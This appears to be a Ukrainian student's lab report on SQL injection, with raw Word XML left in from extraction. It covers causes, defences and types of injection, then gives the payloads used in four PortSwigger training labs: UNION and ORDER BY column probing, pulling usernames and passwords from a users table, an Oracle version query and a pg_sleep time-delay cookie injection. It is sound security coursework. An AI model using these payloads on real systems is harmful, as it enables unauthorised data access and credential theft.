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1. Дати визначення що таке SQL ін'єкція. Чому вона виникає. Які існують методи усунення цієї вразливості.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SQL ін'єкція являє собою відправку користувачем до серверу модифікованих SQL запитів для досягнення певної мети – отримати доступ до даних з БД, змінити чи видалити їх, втрутитись в роботу системи.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Вразливість чи невразливість до SQL ін'єкцій обумовлена тим, як сервер обробляє користувацький ввід. Причинами вразливості можуть бути: недостатня валідація інпутів користувача, використання конкатенації рядків замість параметризації та схожих технік, відсутність технік санітизації даних, непродумана система доступу. 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Щоб запобігти такому типу атак, насамперед необхідно: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валідувати та санітизувати дані, що надходять від користувача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використовувати параметризовані запити, prepared statements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використовувати Object-Relational Mapping бібліотеки (щоб не використовувати raw SQL запити)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звести до необхідного мінімума права доступу, пермішени до БД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уникати надання занадто багато інформації у повідомленнях про помилки, щоб зловмисники не могли скласти картину про структуру БД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підтримувати up-to-date бібліотеки, фреймворки, БД – оновлення можуть містити фікси вразливостей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code review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securite testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i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2. Які види ін'єкцій існують. Надайте опис до будь-яких 2 з них у спеціфіці цієї вразливості.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Взагалі можна виокремити 3 основні групи: error based, union based та blind (тут виділяються boolean і time based).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Error based SQL ін'єкції полягають у зборіі інформації про БД, її інфраструктуру з повідомлень про помилки. Тобто зловмисник навмисно відправляє запити, що викликають ерори на БД сервері і збирає по крихтам інформацію з повідомлень, які повертає сервер.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  <w:t xml:space="preserve">UNION based SQL ін'єкції передбачають використання оператора UNION в запитах, щоб отримувати дані з кількох таблиць. Зловмисник знаходить уразливе місце в системі, додає до існуючого коректного запита свій злонамірний код, який буде намагатися досягти до потрібної таблиці/даних.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3. Створіть обліковий запис на сійті https://portswigger.net/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+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4. Перейдіть у розділ всіх лабораторних робіт https://portswigger.net/web-security/all-labs . Виконайте 4 тестових завдання по темі SQL ін'єкцій. До звіту додайте свій користувацький ввод та скріншот з успішним виконанням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LAB1 SQL injection UNION attack, determining the number of columns returned by the query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Два альтернативні способи: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#1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> додати UNION та перебрати кількість, допоки не отримуємо 200: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https://0ab4000003118c4f80de534900f2008e.web-security-academy.net/filter?category=Pets%27+UNION+SELECT+NULL--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https://0ab4000003118c4f80de534900f2008e.web-security-academy.net/filter?category=Pets%27+UNION+SELECT+NULL,+NULL--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https://0ab4000003118c4f80de534900f2008e.web-security-academy.net/filter?category=Pets%27+UNION+SELECT+NULL,+NULL,+NULL--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#2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> додати ORDER BY та перебрати кількість допоки сервер почне повертати пятисотку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https://0ab4000003118c4f80de534900f2008e.web-security-academy.net/filter?category=Pets%27+ORDER+BY+2--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https://0ab4000003118c4f80de534900f2008e.web-security-academy.net/filter?category=Pets%27+ORDER+BY+3--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https://0ab4000003118c4f80de534900f2008e.web-security-academy.net/filter?category=Pets%27+ORDER+BY+4--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00713" cy="2481041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33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2481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LAB2 SQL injection UNION attack, retrieving data from other tables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step#1 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">визначити кількість стовпчиків в поточній таблиці шляхом перебирання в ORDER BY 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https://0a6300af033cddc58097590400000007.web-security-academy.net/filter?category=Accessories%27+ORDER+BY+3--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step#2 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">визначити, чи в в поточній таблиці обидва стовпчики мають текстовий формат (щоб використовувати UNION, в стовпчиках з 2 таблиць повинний бути однаковий тип даних)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https://0a6300af033cddc58097590400000007.web-security-academy.net/filter?category=Accessories%27+UNION+SELECT+%27sdsd%27,%27sdsd%27--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step#3 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">відправити запит з UNION, щоб дістати потрібні дані з таблиці users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https://0a7100eb035e88de8117eebc003a00ea.web-security-academy.net/filter?category=Accessories%27+UNION+SELECT+username,+password+FROM+users--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93357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3472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LAB3 SQL injection attack, querying the database type and version on Oracle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step#1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> визначити кількість стовпчиків в поточній таблиці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https://0af100e203984b4e858d687b0073004f.web-security-academy.net/filter?category=Toys+%26+Games%27+ORDER+BY+2--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https://0af100e203984b4e858d687b0073004f.web-security-academy.net/filter?category=Toys+%26+Games%27+ORDER+BY+3--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step#2 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">визначити, чи стовпчики мають текстовий формат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https://0af100e203984b4e858d687b0073004f.web-security-academy.net/filter?category=Toys+%26+Games%27+UNION+SELECT+%27dsdsd%27,%27sdsdd%27+FROM+dual--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step#3 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">відправити запит з UNION, запитуючи значення з стовпчика BANNER, що містить дані про БД, + порожнє значення, щоб збіглась кількість стовпчиків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https://0ad300a703093cd080c40875006900d3.web-security-academy.net/filter?category=Food+%26+Drink%27+UNION+SELECT+BANNER,NULL+FROM+v$version--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0765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522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LAB4 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SQL injection with time delays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step#1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> запит на сторінку категорії був затреканий в Burp Suite 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step#2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> в запиті робимо зміну в</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookies: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було</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie: TrackingId=StiPpmmmMWrtV618;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стало</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie: TrackingId=x'||pg_sleep(10)--;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98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508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5.Який вплив на систему та які наслідки може спричинити такий тип вразливостей? Аргументуйте свою відповідь.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цілому, усі вразливості до SQL ін'єкцій можуть призвести до витоку конфіденційних даних, втрати цілісності даних, отримання несанкціонованого доступу до БД, порушення функціонування системи та інших негативних наслідків.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Можливість SQL ін'єкції для отримання кількості стовпчиків в таблиці – це, по-перше, може бути індикатором наявності вразливості до SQL ін'єкцій, а по-друге, може бути початковим етапом у дослідженні зловмисником структури таблиці для подальших ін'єкцій для отримання даних.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Можливість з використанням UNION отримати дані з іншою таблиці – це надважлива вразливість, оскільки відкриває для зловмисників доступ до конфіденційних, чутливих даних (як було в лабораторній, це були username і паролі користувачів).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SQL ін'єкція для визначення типу та версії БД надає можливість зібрати інформацію про інфраструктуру зберігання даних. Маючи ці знання про систему, зловмисник може розробляти подальші плани атак.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Time based SQL ін'єкції можуть стати індикатором наявності вразливості до SQL ін'єкцій у системах, де немає виводу інформації і зловмисник не може бачити результат відправки свого коду. Також такі ін'єкції можна поєднувати з умовами true/false, що дає змогу отримати потрібні дані з БД.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144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